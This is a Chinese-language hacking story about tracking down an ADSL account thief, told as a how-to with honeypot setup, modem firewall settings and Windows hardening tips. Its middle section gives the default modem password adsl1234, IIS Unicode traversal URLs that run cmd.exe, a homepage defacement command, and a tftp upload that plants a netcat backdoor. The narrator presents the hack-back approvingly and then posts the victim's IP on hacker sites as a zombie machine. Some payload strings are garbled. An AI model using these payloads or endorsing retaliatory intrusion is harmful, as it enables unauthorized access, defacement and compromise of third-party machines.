巧破ADSL賬號(hào)被盜案

網(wǎng)絡(luò)的高速發(fā)展帶動(dòng)了很多商機(jī)， 同時(shí)也造出了很多危險(xiǎn)因素， 網(wǎng)絡(luò)上的賬號(hào)被盜事件一直是令網(wǎng)名十分頭痛的事， 這不前幾天鄰居莫沙又跟我談起她家的ADSL帳號(hào)被盜事件， 由于是看在MM象我哭訴的份上， 身為BT下載狂人的我， 暗下決定要親自捉住此燎， 以在MM面前提高威信……

　　巧布疑陣

　　星期六通常是我的星期天， 我早早爬起床， 胡亂吃了點(diǎn)東西， 開始布陣， 從網(wǎng)絡(luò)上下載了冰河陷井V1.2版來進(jìn)行硬盤安裝,接下來利用“冰河陷阱”的偽裝功能來誘捕入侵者。 首先我運(yùn)行冰河陷阱進(jìn)入到主界面， 接下來在點(diǎn)擊“設(shè)置”菜單中的“設(shè)置監(jiān)聽端口”， 然后輸入端口號(hào)23,接下來我依次又設(shè)置了文件列表生存器,我在文件列表生存器中的“真實(shí)目錄”中填入“D:\TEMP\DRIVER_C”完成后,又在“偽裝成驅(qū)動(dòng)器”下拉框中選擇“C:”然后點(diǎn)擊“添加”按鈕將映射關(guān)系填入列表,并在“真實(shí)目錄”中填入“D:\TEMP\DRIVER_D”接著在“偽裝成驅(qū)動(dòng)器”下拉框中選擇“D:”,然后點(diǎn)擊“添加”按鈕將映射關(guān)系填入列表,好了再一次點(diǎn)擊“生成文件”按鈕重新生成DAT目錄下“文件列表.txt”文件.好了一個(gè)簡單的冰河陷井技術(shù)完工了,由D盤TEMP目錄下的DRIVER_C目錄生成虛擬的C盤文件列表， 由D盤TEMP目錄下的DRIVER_D目錄生成虛擬的D盤文件列表……只要有黑客進(jìn)行遠(yuǎn)程訪問裝好的文件列表.txt 時(shí)那么當(dāng)監(jiān)控端點(diǎn)擊“文件管理器”中的驅(qū)動(dòng)器或目錄時(shí)， “冰河陷阱”自動(dòng)從該文件中檢索信息， 并發(fā)送相應(yīng)的目錄及文件信息……這下看你如何逃出我滴手心……

　　網(wǎng)內(nèi)來客

　　八千黑客入沙場， 兵步無車夜瘋狂 …… 此時(shí)異地黑客工作室的流氓兔又在用盜來的ADSL帳號(hào)瘋狂上網(wǎng)， 上著上著突然掉線， 正在傳奇癮上那容斷線， 流氓兔用盡全身的力氣火速重新連接， 天啊， 連接N次無結(jié)果， 看來是被盜的用戶發(fā)覺了， 并改寫了密碼……郁悶……抽出一支不帶過濾嘴無名香煙， 溫柔地放在鼻邊輕輕地嗅了嗅！流氓兔習(xí)慣性在做壞事前總是要重復(fù)這一動(dòng)作……兩眼在眼眶內(nèi)做了一次嵌入式掃描后， 一個(gè)念頭轉(zhuǎn)上了眉梢， 重新尋找ADSL帳號(hào)并進(jìn)行入侵， 以備傳奇之需……直奔H盤hack目錄下， 找出黑客工作室的通用工具SUPPERSCAN,該工具掃描速度快， 支持端口掃描與IP轉(zhuǎn)換， 并可以掃描單個(gè)IP端口……流氓兔首先在軟件主界面的port list setup里里選上23號(hào)端口， 然后回主界面在IP地址段中輸入219.XXX.XXX.1到219.XXX.XXX.254， 點(diǎn)擊start按紐， 不大一會(huì)功夫， 藍(lán)色屏幕上刷刷地找到N臺(tái)主機(jī)來， 一一觀看事， 哈哈招思慕想的23號(hào)端口出現(xiàn)了， 流氓兔決定作出進(jìn)一步的行動(dòng)， 迅速連接， 在網(wǎng)頁地址中輸入IP地址219.XXX.XXX.XXX網(wǎng)絡(luò)就在瞬間彈出一個(gè)登陸對話框， 要求輸入用戶名與密碼， 頭略微在流氓兔脖子上轉(zhuǎn)動(dòng)了一下， 用老方法ADSL的缺省adsl1234吧， 在彈出的對話框中輸入用戶名ADSL密碼adsl1234， 哈哈， 得來全不費(fèi)功夫， 進(jìn)來了進(jìn)來了！這次居然連弱口令都不用猜， 就看到了他的真實(shí)ADSL帳戶與密碼……這次點(diǎn)上剛剛沒抽的煙， 云升一會(huì)……迅速用獲得的ADSL帳號(hào)上網(wǎng)……

　　收網(wǎng)捕魚

　　就是我漫長的等待過后， 夜深沉……系統(tǒng)托盤中的冰河陷阱圖標(biāo)不斷閃爍開始報(bào)警， 同時(shí)還有聲音響起， 啊哈魚兒入網(wǎng)了， 趕塊雙擊圖標(biāo)打開“冰河陷阱”主界面， 在列表中可以看到入侵者的IP地址、所在地以及登錄密碼和詳細(xì)的操作過程……看完這些后我開始追捕行動(dòng)！

　　打開工具rangescan工具， 輸入入侵者的IP地址， 并在from中填入218.xxx.xxx.xxx to 中填入218.xxx.xxx.xxx在掃描內(nèi)容框中寫入:/scripts/..%cl%lc../winnt/system32/cmd.exe完成后， 輕輕一擊掃描鍵， 軟件自個(gè)開始工作， 而我則開始看電影屏道的大汗天子……天子結(jié)束后我回到屏上， 哎呀， 軟件有結(jié)果了,趕快確定一下,打開IE在其中輸入http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir回車,哈哈但見頁面還回如下:

　　Directory of c:\inetpub\scripts

　　2000-08-06 19 DIR>.

　　2000-08-06 19 DIR>..

　　0 File(s) 0 bytes

　　2 Dir(s)11,556,635,276 bytes free

　　果然存在此漏洞,那我就利用ECHO回顯命令及管道工具來改一下他的WEB頁面,格式如下:

　　http://218.xxx.xxx.xxx/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot

　　嘿嘿看到他的主頁的存放目錄了,那就修改吧,格式如下:

　　c:\inetpub\wwwroot\default.asp'>http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd".exe?/c+echo+I+love+my+homeland+>c:\inetpub\wwwroot\default.asp

　　哈哈,主頁已修改完成,接下來我得控制他的主機(jī),首先我從網(wǎng)絡(luò)上下載了tftpd32.exe和ncx99.exe兩個(gè)軟件,并運(yùn)行tftpd32.exe使本機(jī)成為FTP服務(wù)器,在IE中輸入命令如下:

　　http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+tftp -i 127.0.0.1 GET ncx99.exe c:\inetpub\scripts\\hack.exe這時(shí)我已完成上傳ncx99.exe到對方主機(jī)并改名為hack.exe文件.緊接著我開始在IE中輸入命令來讓hack.exe執(zhí)行如下:

　　http://218.xxx.xxx.xxx/scripts/..%cl%lc../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\hack.exe

　　good命令成功完成,哈哈接下來我更省事了,可以用遠(yuǎn)程telnet來隨時(shí)連接他了,小樣,你想安穩(wěn)地過日子只怕很難咯~于是我將他的IP地址發(fā)布在了黑客網(wǎng)站上,肉雞成立……

　　裝備ADSL

　　夜總是在我睡醒后退去……天明打一個(gè)電話到莫沙家讓她準(zhǔn)備我的早餐， 然后我

　　晃晃悠悠地起身前去……莫沙的計(jì)算機(jī)前坐定， 開始從計(jì)算機(jī)里配置ADSL內(nèi)設(shè)的防火墻點(diǎn)擊開始菜單—程序—管理工具—服務(wù)—Firewall， 這時(shí)就打開了ADSL的界面， 我們先看一下ADSL MODEM的全部功能如下：

　　blacklist status黑名單狀態(tài)

　　blacklist period(min)在規(guī)定的時(shí)間內(nèi)指定計(jì)算機(jī)的IP地址會(huì)處在黑名單狀態(tài)下

　　Attack protection 選中Enable可以啟用adsl內(nèi)建的防火墻

　　Dos protection選中Enable可以啟用syn Dos、icmp Dos和per-host Dos服務(wù)性保護(hù)

　　Max Half open Tcp conn設(shè)定不完全開放狀態(tài)， 當(dāng)前IP開放的百分?jǐn)?shù)。

　　Max ICMP Com 為管理ICMP設(shè)定當(dāng)前使用的連接數(shù)量的百分?jǐn)?shù)。

　　Max Single Host Conn設(shè)定單獨(dú)一臺(tái)計(jì)算機(jī)能使用當(dāng)前IP連接的百分?jǐn)?shù)。

　　Log Destination記錄防火墻事件。

　　E-mail ID of Admin 1/2/3指安管理員的電子郵箱地址。

　　我先在Attack protection 選中Enable可以啟用adsl內(nèi)建的防火墻， 并在Dos protection中選擇Enable開啟服務(wù)性保護(hù)， 同時(shí)選中Max Half open Tcp conn設(shè)定不完全開放狀態(tài)， 與此同時(shí)啟用Max ICMP Com 為管理ICMP設(shè)定當(dāng)前使用的連接數(shù)量的百分?jǐn)?shù)。 這樣如果百分?jǐn)?shù)超標(biāo)， 那么這個(gè)不完全開放連接將會(huì)被關(guān)閉， 新的連接將取而代之， 并開始傳輸數(shù)據(jù)， 最后啟用Log Destination記錄防火墻事件。 這樣一但發(fā)現(xiàn)新情況， 記錄的事件將會(huì)發(fā)送給指定的管理員與有關(guān)部門！

　　徹底防衛(wèi)ADSL

　　鄰居莫沙看了我設(shè)置完這些后還是覺得心里沒底， 硬是要我再好好想想有沒有更好的辦法， 并提出請我喝茶， 我眼神一亮……好吧， 難得有MM如此熱情， 我就幫他提高系統(tǒng)安全性吧！

　　首先我在寬帶設(shè)置中用代理獵手工具找到一個(gè)代理服務(wù)器， 隱藏了本機(jī)真實(shí)的IP地址， 接著我又從TCP/IP中進(jìn)入到高級TCP/IP設(shè)置， 在其選項(xiàng)菜單中選擇TCP/IP篩選屬性,從中關(guān)閉了本機(jī)不常用的端口， 只留下80端口， 并更換了管理員的帳戶與密碼， 從注冊表中刪除了GUEST帳戶， 將TCP/IP協(xié)議的NRTBIOS關(guān)閉， 并進(jìn)入注冊表HKEY_CURRENT_USER\SOftware\Microsoft\windows\Curr-entversion\policies\network主鍵下新建DWOED類型鍵值名為NoFileSharing-Contro1從而達(dá)到不讓更改網(wǎng)絡(luò)的文件和打印機(jī)共享功能， 以社絕黑客通過此門進(jìn)入， 然后我又禁止了建立空連接， 只要將本地的安全策略設(shè)為不允許SAM賬戶和共享的匿名連接， 接下來我關(guān)閉了IP安全設(shè)置中的Activex控件與java禁用。 最后我給系統(tǒng)打上了新補(bǔ)丁程序， 并安裝了防火墻……　設(shè)完后， 我氣定神閑地看著莫沙， 莫沙抬頭望了望我又望了望天……天氣不錯(cuò)……愣是壓根閉口不提喝茶的事……